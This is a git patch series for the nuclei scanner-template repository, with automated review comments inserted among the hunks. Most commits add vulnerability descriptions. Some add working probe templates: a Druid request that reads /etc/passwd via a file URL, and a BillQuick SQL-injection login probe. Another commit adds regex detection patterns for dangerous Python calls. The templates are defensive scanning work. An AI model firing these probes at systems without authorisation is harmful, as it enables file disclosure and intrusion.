From a96bfc3992fe58b899aa8a7ade68b30931b1ef1c Mon Sep 17 00:00:00 2001
From: Noam Rathaus
Date: Mon, 25 Oct 2021 12:52:58 +0300
Subject: [PATCH 01/23] Add description
---
 vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml | 1 +
 vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml | 1 +
 2 files changed, 2 insertions(+)
diff --git a/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml b/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml
index 64d1b30634..c7641f841a 100644
--- a/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml
+++ b/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml
@@ -4,6 +4,7 @@ info:
 name: WordPress Weekender Newspaper Themes 9.0 - Open Redirection
 author: 0x_Akoko
 severity: low
+ description: The WordPress Weekender Newspaper Themes allows remote attackers to redirect users to an attacker controlled URL.
 reference: https://cxsecurity.com/issue/WLB-2020040103
 tags: wordpress,wp-plugin,redirect
diff --git a/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml b/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
index 683cf92dc3..226a87797b 100644
--- a/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
+++ b/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
@@ -3,6 +3,7 @@ info:
 name: WordPress accessible wp-config
 author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n
 severity: high
+ description: The remote WordPress installation has the `wp-config` file remotely accessible and its content available for reading.
 tags: wordpress,backup
 requests:
From 6a6ba60aade8f70f1cb9a3e205cff190d340b6e2 Mon Sep 17 00:00:00 2001
From: Noam Rathaus
Date: Mon, 25 Oct 2021 12:53:22 +0300
Subject: [PATCH 02/23] Description
---
 vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml | 1 +
 1 file changed, 1 insertion(+)
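Review bot: The new wp-config description names the file only as `wp-config` and says just that its content is readable, which leaves out what actually gets fetched and why that matters for triage: `description: The remote WordPress installation exposes its wp-config.php (or a backup copy of it, per the backup tag) to unauthenticated readers, disclosing database credentials and authentication keys.` The request path is outside this hunk, so confirm which filenames the template probes before committing to wp-config.php in the text. In the weekender hunk on the same line, the name and the new description call the product a theme while the unchanged `tags:` line says wp-plugin; the eatery template in the next commit uses wp-theme, so `tags: wordpress,wp-theme,redirect` would be consistent.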
diff --git a/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml b/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml
index d649437101..4b8b194cfc 100644
--- a/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml
+++ b/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml
@@ -4,6 +4,7 @@ info:
 name: WordPress Attitude Themes 1.1.1 Open Redirection
 author: 0x_Akoko
 severity: low
+ description: The WordPress Attitude Themes allows remote attackers to redirect users to an attacker controlled URL.
 reference: https://cxsecurity.com/issue/WLB-2020030183
 tags: wordpress,wp-theme,redirect
From c9e9c04f37856d253f422325be2d7e8bd6dd8902 Mon Sep 17 00:00:00 2001
From: Noam Rathaus
Date: Mon, 25 Oct 2021 12:54:00 +0300
Subject: [PATCH 03/23] Add description
---
 vulnerabilities/wordpress/easy-wp-smtp-listing.yaml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml b/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
index 1c669ac324..6225458a19 100644
--- a/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
+++ b/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
@@ -4,6 +4,7 @@ info:
 name: SMTP WP Plugin Directory listing enabled
 author: PR3R00T
 severity: high
+ description: The WordPress Easy WP SMTP Plugin has its 'easy-wp-smtp' folder remotely acccessible and its content available for access.
 reference: https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/
 tags: wordpress,wp-plugin
From 9f8270bb7a4857ec0754eaa59c96a3f4f6137711 Mon Sep 17 00:00:00 2001
From: Noam Rathaus
Date: Mon, 25 Oct 2021 12:54:49 +0300
Subject: [PATCH 04/23] Add description
---
 vulnerabilities/other/webui-rce.yaml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/vulnerabilities/other/webui-rce.yaml b/vulnerabilities/other/webui-rce.yaml
index 82d1fab54a..384fe2d49f 100644
--- a/vulnerabilities/other/webui-rce.yaml
+++ b/vulnerabilities/other/webui-rce.yaml
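Review bot: The description added in the easy-wp-smtp hunk misspells `acccessible`, and "remotely accessible and its content available for access" says the same thing twice without naming the condition the template's own name states (directory listing): `description: The WordPress Easy WP SMTP Plugin exposes its 'easy-wp-smtp' folder with directory listing enabled, so its contents can be read remotely.` In the eatery hunk on the same line, "The WordPress Attitude Themes allows" has a plural subject with a singular verb; `The WordPress Attitude theme allows` reads correctly.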
@@ -3,6 +3,7 @@ info:
 name: WebUI 1.5b6 RCE
 author: pikpikcu
 severity: critical
+ description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter.
 reference: https://www.exploit-db.com/exploits/36821
 tags: webui,rce
From 3029da4ceb8d8c288f22da073e7d6dbcd08994fb Mon Sep 17 00:00:00 2001
From: Noam Rathaus
Date: Mon, 25 Oct 2021 12:55:23 +0300
Subject: [PATCH 05/23] Add description
---
 vulnerabilities/other/unauth-spark-api.yaml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/vulnerabilities/other/unauth-spark-api.yaml b/vulnerabilities/other/unauth-spark-api.yaml
index 8a936e9aa0..56ccbcbe76 100644
--- a/vulnerabilities/other/unauth-spark-api.yaml
+++ b/vulnerabilities/other/unauth-spark-api.yaml
@@ -3,6 +3,7 @@ info:
 name: Unauthenticated Spark REST API
 author: princechaddha
 severity: medium
+ description: The remote Spark product's REST API interface does not appear to prevent unauthenticated users from accesing it.
 reference: https://xz.aliyun.com/t/2490
 tags: spark,unauth
From 319c8a830e9aade672d3dbb6f33c407f806c4d83 Mon Sep 17 00:00:00 2001
From: Noam Rathaus
Date: Mon, 25 Oct 2021 12:56:03 +0300
Subject: [PATCH 06/23] Add description
---
 vulnerabilities/other/vpms-auth-bypass.yaml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/vulnerabilities/other/vpms-auth-bypass.yaml b/vulnerabilities/other/vpms-auth-bypass.yaml
index 6f612b4f78..a59b7b3bd1 100644
--- a/vulnerabilities/other/vpms-auth-bypass.yaml
+++ b/vulnerabilities/other/vpms-auth-bypass.yaml
@@ -4,6 +4,7 @@ info:
 name: Vehicle Parking Management System 1.0 - Authentication Bypass
 author: dwisiswant0
 severity: high
+ description: The Vehicle Parking Management System allows remote attackers to bypass the authentication system by utilizing an SQL injection vulnerability in the 'password' parameter.
 reference: https://www.exploit-db.com/exploits/48877
 tags: auth-bypass
 requests:
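Review bot: Two of the descriptions added on this line carry grammar slips that scan output will show verbatim: in the webui-rce hunk `endpoint contain a vulnerability` should read `endpoint contains a vulnerability`, and in the unauth-spark-api hunk `accesing` should be `accessing`. The Spark wording "does not appear to prevent" also hedges on what a match asserts; since the template's name and `unauth` tag state the finding plainly, `description: The remote Spark REST API accepts requests from unauthenticated users.` fits better.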
From f9fb28277015cba688cbfee2c47a32ad833a0b6f Mon Sep 17 00:00:00 2001
From: Noam Rathaus
Date: Mon, 25 Oct 2021 12:57:40 +0300
Subject: [PATCH 07/23] Add description
---
 vulnerabilities/other/viewlinc-crlf-injection.yaml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/vulnerabilities/other/viewlinc-crlf-injection.yaml b/vulnerabilities/other/viewlinc-crlf-injection.yaml
index c1e677dcb7..199d945cd7 100644
--- a/vulnerabilities/other/viewlinc-crlf-injection.yaml
+++ b/vulnerabilities/other/viewlinc-crlf-injection.yaml
@@ -4,6 +4,7 @@ info:
 name: viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection.
 author: geeknik
 severity: low
+ description: The viewLinc application allows remote attackers to inject a CRLF character into the responses returned by the product, this allows attackers to inject arbitrary HTTP headers into the response returned.
 reference: https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system
 tags: crlf,viewlinc
From e4018d4a0c54552db90609699790ef47d52f56a1 Mon Sep 17 00:00:00 2001
From: Noam Rathaus
Date: Mon, 25 Oct 2021 12:58:22 +0300
Subject: [PATCH 08/23] Add description
---
 vulnerabilities/other/ueditor-file-upload.yaml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/vulnerabilities/other/ueditor-file-upload.yaml b/vulnerabilities/other/ueditor-file-upload.yaml
index 07225c62db..733c46e297 100644
--- a/vulnerabilities/other/ueditor-file-upload.yaml
+++ b/vulnerabilities/other/ueditor-file-upload.yaml
@@ -3,6 +3,7 @@ info:
 name: UEditor Arbitrary File Upload
 author: princechaddha
 severity: high
+ description: A vulnerability in UEditor allows remote unauthenticated attackers to upload arbitrary files to the server, this in turn can be used to make the application to execute their content as code.
 reference:
 - https://zhuanlan.zhihu.com/p/85265552
 - https://www.freebuf.com/vuls/181814.html
From 081a2546fefd906ac50420a5175a6576a93f827f Mon Sep 17 00:00:00 2001
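Review bot: The viewlinc description added here is a comma splice that repeats "returned" and "inject" in one sentence; a tighter form that says the same thing is `description: The viewLinc application lets remote attackers inject CRLF sequences into its responses, which allows arbitrary HTTP headers to be added to the response.` The ueditor hunk on the same line has a similar splice plus "make the application to execute"; `..., which can lead to the uploaded content being executed as code.` keeps the meaning and fixes the grammar.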
From: Noam Rathaus
Date: Mon, 25 Oct 2021 12:59:08 +0300
Subject: [PATCH 09/23] Add description
---
 vulnerabilities/other/wems-manager-xss.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/vulnerabilities/other/wems-manager-xss.yaml b/vulnerabilities/other/wems-manager-xss.yaml
index b73ec6dc84..db201ad502 100644
--- a/vulnerabilities/other/wems-manager-xss.yaml
+++ b/vulnerabilities/other/wems-manager-xss.yaml
@@ -5,7 +5,7 @@ info:
 author: pikpikcu
 severity: medium
 tags: xss
-
+ description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary Javascript into the response return by the server by sending it to the '/guest/users/forgotten' endpoint and the 'email' parameter.
 reference:
 - https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html
From a197ec8370d00a0d9a634a28b4d75eeb62a28794 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Mon, 25 Oct 2021 16:03:46 +0530
Subject: [PATCH 10/23] misc formatting update
---
 file/python/python-scanner.yaml | 17 ++++++++++-------
 1 file changed, 10 insertions(+), 7 deletions(-)
diff --git a/file/python/python-scanner.yaml b/file/python/python-scanner.yaml
index 6f7b8770d6..6542b33797 100644
--- a/file/python/python-scanner.yaml
+++ b/file/python/python-scanner.yaml
@@ -4,7 +4,7 @@ info:
 name: Python Scanner
 author: majidmc2
 severity: info
- description: Scan for dangerous Python functions
+ description: Indicators for dangerous Python functions
 reference:
 - https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html
 - https://www.kevinlondon.com/2015/08/15/dangerous-python-functions-pt2.html
@@ -17,7 +17,8 @@ file:
 extractors:
 - type: regex
- name: Possible Code Injection
+ name: code-injection
+ condition: or
 regex:
 - 'exec'
 - 'eval'
@@ -25,7 +26,8 @@ file:
 - type: regex
- name: Possible Command Injection
+ name: command-injection
+ condition: or
 regex:
 - 'subprocess.call\(.*shell=True.*\)'
 - 'os.system'
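Review bot: The wems-manager-xss description added here reads `response return by the server` (should be `returned`) and names the endpoint and parameter as two separate things joined by "and", which hides that one is the field of the other: `description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary JavaScript into the server's response via the 'email' parameter of the '/guest/users/forgotten' endpoint.` Note also that the blank line separating `tags:` from `reference:` is replaced rather than kept, so this info block ends up formatted differently from the others touched in this series.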
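Review bot: Now that the extractor in the @@ -17 hunk is named `code-injection`, the unchanged patterns `'exec'` and `'eval'` beneath it match any substring — `execute`, `executor`, `evaluate`, `retrieval` — so most hits will be noise presented under a definite-sounding label; anchoring them to a call makes the name honest: `- '\bexec\s*\('` and `- '\beval\s*\('`. The `'os.system'` pattern in the @@ -25 hunk has the same shape problem in milder form (the unescaped dot is harmless, but `\bos\.system\s*\(` is the intended match). Both extractor definitions continue past their hunks, so the rest of each regex list is not visible here.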
@@ -33,18 +35,19 @@ file:
 - type: regex
- name: Possibly Unpickling untrusted source
+ name: untrusted-source
+ condition: or
 regex:
 - 'pickle.loads'
 - 'cPickle.loads'
 - type: regex
- name: Possibly loading dangerous YAMLs
+ name: dangerous-yaml
 regex:
 - 'yaml.load'
 - type: regex
- name: Possible SQLi
+ name: sqli
 regex:
- - 'cursor.execute'
+ - 'cursor.execute'
\ No newline at end of file
From 0eb9092fe2c103011761e6157188208e0b15dece Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Mon, 25 Oct 2021 10:55:07 +0000
Subject: [PATCH 11/23] Auto README Update [Mon Oct 25 10:55:07 UTC 2021] :robot:
---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 47d02bb65e..46fe32d081 100644
--- a/README.md
+++ b/README.md
@@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags,
 | wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | |
 | cve2020 | 166 | madrobot | 63 | file | 50 | | | | |
-**176 directories, 2418 files**.
+**177 directories, 2443 files**.
From e30362f0ab493a81f6d6f787ceacc5b43e739d85 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Mon, 25 Oct 2021 17:08:57 +0530
Subject: [PATCH 12/23] extractors doesn't support "condition" attribute explicitly
---
 file/python/python-scanner.yaml | 3 ---
 1 file changed, 3 deletions(-)
diff --git a/file/python/python-scanner.yaml b/file/python/python-scanner.yaml
index 6542b33797..c949abfae5 100644
--- a/file/python/python-scanner.yaml
+++ b/file/python/python-scanner.yaml
@@ -18,7 +18,6 @@ file:
 extractors:
 - type: regex
 name: code-injection
- condition: or
 regex:
 - 'exec'
 - 'eval'
@@ -27,7 +26,6 @@ file:
 - type: regex
 name: command-injection
- condition: or
 regex:
 - 'subprocess.call\(.*shell=True.*\)'
 - 'os.system'
@@ -36,7 +34,6 @@ file:
 - type: regex
 name: untrusted-source
- condition: or
 regex:
 - 'pickle.loads'
 - 'cPickle.loads'
From 1db2405c25e4ef807ad8d961fd585f75b0eeade3 Mon Sep 17 00:00:00 2001
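Review bot: `name: untrusted-source` drops the one word that said what this extractor finds — the old label "Possibly Unpickling untrusted source" told the reader it is a pickle deserialization hit, and the two `pickle.loads` patterns under it confirm that; `name: unsafe-pickle-load` keeps the new kebab-case style without the loss of meaning. Further down the same hunk the re-added `- 'cursor.execute'` line under the `sqli` extractor fires on every query, parameterized or not, so that label over-claims as well; narrowing it to string-built calls, e.g. `- 'cursor\.execute\(.*(%|\+|\.format\()'`, would at least skip the safe form (f-string arguments would still slip through). The enclosing `file:` block starts outside this hunk.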
From: Prince Chaddha
Date: Mon, 25 Oct 2021 17:30:48 +0530
Subject: [PATCH 13/23] Create CVE-2021-36749.yaml
---
 cves/2021/CVE-2021-36749.yaml | 35 +++++++++++++++++++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 cves/2021/CVE-2021-36749.yaml
diff --git a/cves/2021/CVE-2021-36749.yaml b/cves/2021/CVE-2021-36749.yaml
new file mode 100644
index 0000000000..c0f1e3224e
--- /dev/null
+++ b/cves/2021/CVE-2021-36749.yaml
@@ -0,0 +1,35 @@
+id: CVE-2021-36749
+
+info:
+ name: Apache Druid Authentication Restrictions Bypass
+ author: _0xf4n9x_
+ severity: medium
+ description: In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-36749
+ - https://www.cvedetails.com/cve/CVE-2021-36749/
+ - https://github.com/BrucessKING/CVE-2021-36749
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 6.5
+ cve-id: CVE-2021-36749
+ cwe-id: CWE-668
+ tags: cve,cve2021,apache,lfi,auth-bypass
+
+requests:
+ - raw:
+ - |
+ POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+
+ {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":[" file:///etc/passwd "]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string", "parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"no_ such_ column","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0:"
+ - "druid:*:1000:1000:"
+ condition: or
From 3c21e2fc163b4fe6dfbf2ccb5415f7fffefc7b19 Mon Sep 17 00:00:00 2001
From: Philipp Dahse
Date: Mon, 25 Oct 2021 15:45:49 +0200
Subject: [PATCH 14/23] Add Redis Commander Panel Detection
Redis Commander is a common ui for redis. Access to Redis Commander can allow access to redis and expose sensible session or cache data.
---
 exposed-panels/redis-commander-exposure.yaml | 22 ++++++++++++++++++++
 1 file changed, 22 insertions(+)
 create mode 100644 exposed-panels/redis-commander-exposure.yaml
diff --git a/exposed-panels/redis-commander-exposure.yaml b/exposed-panels/redis-commander-exposure.yaml
new file mode 100644
index 0000000000..fea8a67df6
--- /dev/null
+++ b/exposed-panels/redis-commander-exposure.yaml
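Review bot: The `classification:` block contradicts itself: the vector `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` computes to a base score of 8.8, not the `cvss-score: 6.5` written beneath it; 6.5 is what these same exploitability metrics yield with C:H/I:N/A:N, which also agrees with `severity: medium` and with a read-only file-disclosure issue, so the vector string is the likely error — check it against the NVD entry listed in `reference:` and make the three fields agree. Separately, the second body regex `"druid:*:1000:1000:"` is broken: `:*` means "zero or more colons", so the pattern only matches `druid` followed directly by `:1000:1000:` and never a real passwd-style line that has a field between; the intended form, matching the sibling pattern, is `- "druid:.*:1000:1000:"`. The `condition: or` masks this today because the `root:` pattern still fires, so the defect would only show on a host without a root entry in the returned data. This is a new file, so the whole template is within the hunk.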
@@ -0,0 +1,22 @@
+id: redis-commander-exposure
+
+info:
+ name: Redis Commander Exposure
+ author: dahse89
+ severity: low
+ reference:
+ - https://joeferner.github.io/redis-commander/
+ - https://github.com/joeferner/redis-commander
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers:
+ - type: word
+ words:
+ - "Redis Commander"
+ - "redisCommanderBearerToken"
+ condition: and
From bf7070dbc786b501601d8030337c328d4dc26e2e Mon Sep 17 00:00:00 2001
From: Dwi Siswanto <dwi.siswanto98@gmail.com>
Date: Tue, 26 Oct 2021 15:26:22 +0700
Subject: [PATCH 15/23] Add CVE-2021-42258
---
 cves/2021/CVE-2021-42258.yaml | 66 +++++++++++++++++++++++++++++++++++
 1 file changed, 66 insertions(+)
 create mode 100644 cves/2021/CVE-2021-42258.yaml
diff --git a/cves/2021/CVE-2021-42258.yaml b/cves/2021/CVE-2021-42258.yaml
new file mode 100644
index 0000000000..203f286368
--- /dev/null
+++ b/cves/2021/CVE-2021-42258.yaml
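Review bot: The new template's `info:` block has no `description:`, while every other template touched in this series is getting one; the commit message already contains the text, so it only needs moving into the file: `description: Redis Commander, a web UI for Redis, is exposed. Access to it can allow access to the backing Redis instance and the session or cache data it holds.` The word matcher carries no `part:` (body by default) and there is no status matcher, which is acceptable for an exposure check but means any page echoing both strings would count; if that proves noisy, a `- type: status` matcher with `matchers-condition: and` is the usual tightening. This is a new file, so the whole template is within the hunk.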
@@ -0,0 +1,66 @@
+id: CVE-2021-42258
+
+info:
+ name: BillQuick Web Suite SQLi
+ author: dwisiswant0
+ severity: high
+ tags: bqe,cve,cve2021,sqli
+ description: |
+ This template supports the detection part only. See references.
+
+ BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1
+ allows SQL injection for unauthenticated remote code execution,
+ as exploited in the wild in October 2021 for ransomware installation.
+ SQL injection can, for example, use the txtID (aka username) parameter.
+ Successful exploitation can include the ability to execute
+ arbitrary code as MSSQLSERVER$ via xp_cmdshell.
+ reference: https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware
+
+requests:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Referer: {{BaseURL}}
+ Origin: {{RootURL}}
+ Connection: close
+ Content-Type: application/x-www-form-urlencoded
+
+ __EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
+
+ cookie-reuse: true
+ extractors:
+ - type: xpath
+ name: VS
+ internal: true
+ attribute: value
+ xpath:
+ - "/html/body/form/div/input[@id='__VIEWSTATE']"
+
+ - type: xpath
+ name: VSG
+ internal: true
+ attribute: value
+ xpath:
+ - "/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"
+
+ - type: xpath
+ name: EV
+ internal: true
+ attribute: value
+ xpath:
+ - "/html/body/form/div/input[@id='__EVENTVALIDATION']"
+
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "Incorrect syntax near"
+ - "_ACCOUNTLOCKED"
+
+
+
From 9773130879cc402a823b2c2a91db5f878987fdfa Mon Sep 17 00:00:00 2001
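Review bot: `severity: high` sits directly above a description that states unauthenticated remote code execution exploited in the wild for ransomware deployment, which is the profile this repository labels critical elsewhere (the webui-rce template earlier in this series is `severity: critical`); `severity: critical` matches the text, and the NVD entry for CVE-2021-42258 is the place to confirm it. The `info:` block also lacks the `classification:` block that the CVE-2021-36749 template added two commits earlier carries, so the CVE id lives only in `id:`; at minimum `classification:` followed by `cve-id: CVE-2021-42258` (plus `cvss-metrics`/`cvss-score` once verified) keeps the two CVE templates in this series consistent. This is a new file, so the whole template is within the hunk.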
From: Dwi Siswanto <dwi.siswanto98@gmail.com>
Date: Tue, 26 Oct 2021 15:31:41 +0700
Subject: [PATCH 16/23] Remove blank lines
---
 cves/2021/CVE-2021-42258.yaml | 5 +----
 1 file changed, 1 insertion(+), 4 deletions(-)
diff --git a/cves/2021/CVE-2021-42258.yaml b/cves/2021/CVE-2021-42258.yaml
index 203f286368..47adea9eea 100644
--- a/cves/2021/CVE-2021-42258.yaml
+++ b/cves/2021/CVE-2021-42258.yaml
@@ -60,7 +60,4 @@ requests:
 part: body
 words:
 - "Incorrect syntax near"
- - "_ACCOUNTLOCKED"
-
-
-
+ - "_ACCOUNTLOCKED"
\ No newline at end of file
From 1986e1211d358891cc0dea5344e41b8b3130c0fa Mon Sep 17 00:00:00 2001
From: sandeep <sandeep@projectdiscovery.io>
Date: Tue, 26 Oct 2021 14:25:37 +0530
Subject: [PATCH 17/23] Adding condition between word matcher
---
 cves/2021/CVE-2021-42258.yaml | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/cves/2021/CVE-2021-42258.yaml b/cves/2021/CVE-2021-42258.yaml
index 47adea9eea..2920990570 100644
--- a/cves/2021/CVE-2021-42258.yaml
+++ b/cves/2021/CVE-2021-42258.yaml
@@ -27,7 +27,6 @@ requests:
 Host: {{Hostname}}
 Referer: {{BaseURL}}
 Origin: {{RootURL}}
- Connection: close
 Content-Type: application/x-www-form-urlencoded
 __EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
@@ -58,6 +57,8 @@ requests:
 matchers:
 - type: word
 part: body
+ condition: and
 words:
+ - "System.Data.SqlClient.SqlException"
 - "Incorrect syntax near"
- - "_ACCOUNTLOCKED"
\ No newline at end of file
+ - "_ACCOUNTLOCKED"
From 2fa9791bdcab1aea46b2ffc0d84552876e2c9bee Mon Sep 17 00:00:00 2001
From: sandeep <sandeep@projectdiscovery.io>
Date: Tue, 26 Oct 2021 14:32:23 +0530
Subject: [PATCH 18/23] misc update
---
 cves/2021/CVE-2021-42258.yaml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/cves/2021/CVE-2021-42258.yaml b/cves/2021/CVE-2021-42258.yaml
index 2920990570..64def1d504 100644
--- a/cves/2021/CVE-2021-42258.yaml
+++ b/cves/2021/CVE-2021-42258.yaml
@@ -4,17 +4,17 @@ info:
 name: BillQuick Web Suite SQLi
 author: dwisiswant0
 severity: high
- tags: bqe,cve,cve2021,sqli
+ tags: cve,cve2021,sqli,billquick
 description: |
- This template supports the detection part only. See references.
-
 BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1
 allows SQL injection for unauthenticated remote code execution,
 as exploited in the wild in October 2021 for ransomware installation.
 SQL injection can, for example, use the txtID (aka username) parameter.
 Successful exploitation can include the ability to execute
 arbitrary code as MSSQLSERVER$ via xp_cmdshell.
- reference: https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware
+ reference:
+ - https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-42258
 requests:
 - raw:
From 8fb9b08e61721144ad21a0baa876ed7512ab7383 Mon Sep 17 00:00:00 2001
From: sandeep <sandeep@projectdiscovery.io>
Date: Tue, 26 Oct 2021 15:02:32 +0530
Subject: [PATCH 19/23] misc update
---
 .github/workflows/template-validate.yml | 4 +---
 1 file changed, 1 insertion(+), 3 deletions(-)
diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml
index a158694063..705f870c7e 100644
--- a/.github/workflows/template-validate.yml
+++ b/.github/workflows/template-validate.yml
@@ -20,10 +20,8 @@ jobs:
 - name: Installing Nuclei
 # if: steps.cache-go.outputs.cache-hit != 'true'
- env:
- GO111MODULE: on
 run: |
- go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev
+ go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
 shell: bash
 - name: Template Validation
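Review bot: The template-validate workflow now runs `go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest`, so what validates every pull request is whichever nuclei release is newest at run time: results can change, the job can break, or a release nobody here reviewed can be pulled into CI without any change to this repository, whereas `@dev` at least tracked a branch the maintainers control. Pin the tool and bump it deliberately: `go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@<pinned-version>` (placeholder — substitute the tag this repository was validated against), with a short comment above `run:` saying why it is pinned. The commented-out `# if: steps.cache-go…` line kept above the step now refers to caching that no longer exists; dropping it, or restoring the condition, keeps the step readable. The job definition starts outside this hunk.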
From fb81f4ca362fa57569909200cb7445795cfba33f Mon Sep 17 00:00:00 2001
From: Noam Rathaus <noamr@beyondsecurity.com>
Date: Tue, 26 Oct 2021 12:35:56 +0300
Subject: [PATCH 20/23] Better description
---
 vulnerabilities/wordpress/wp-upload-data.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/vulnerabilities/wordpress/wp-upload-data.yaml b/vulnerabilities/wordpress/wp-upload-data.yaml
index 8539ff6058..9a474dff0a 100644
--- a/vulnerabilities/wordpress/wp-upload-data.yaml
+++ b/vulnerabilities/wordpress/wp-upload-data.yaml
@@ -4,7 +4,7 @@ info:
 name: wordpress-upload-data
 author: pussycat0x
 severity: medium
- description: Searches for Passwords in the wordpress uploads directory.
+ description: The remote WordPress installation contains a file 'data.txt' under the '/wp-content/uploads/' folder that has sensitive information inside it.
 reference: https://www.exploit-db.com/ghdb/7040
 tags: wordpress,listing
From 9c96179595244775a99b53311e59ef80e0c193eb Mon Sep 17 00:00:00 2001
From: Noam Rathaus <noamr@beyondsecurity.com>
Date: Tue, 26 Oct 2021 12:45:16 +0300
Subject: [PATCH 21/23] Fix description
---
 vulnerabilities/other/solar-log-authbypass.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/vulnerabilities/other/solar-log-authbypass.yaml b/vulnerabilities/other/solar-log-authbypass.yaml
index 382d65e232..7e3f5cd21d 100644
--- a/vulnerabilities/other/solar-log-authbypass.yaml
+++ b/vulnerabilities/other/solar-log-authbypass.yaml
@@ -4,7 +4,7 @@ info:
 name: Solar-Log 500 2.8.2 - Incorrect Access Control
 author: geeknik
 severity: high
- description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers>
+ description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers gain administrative privileges by connecting to the server
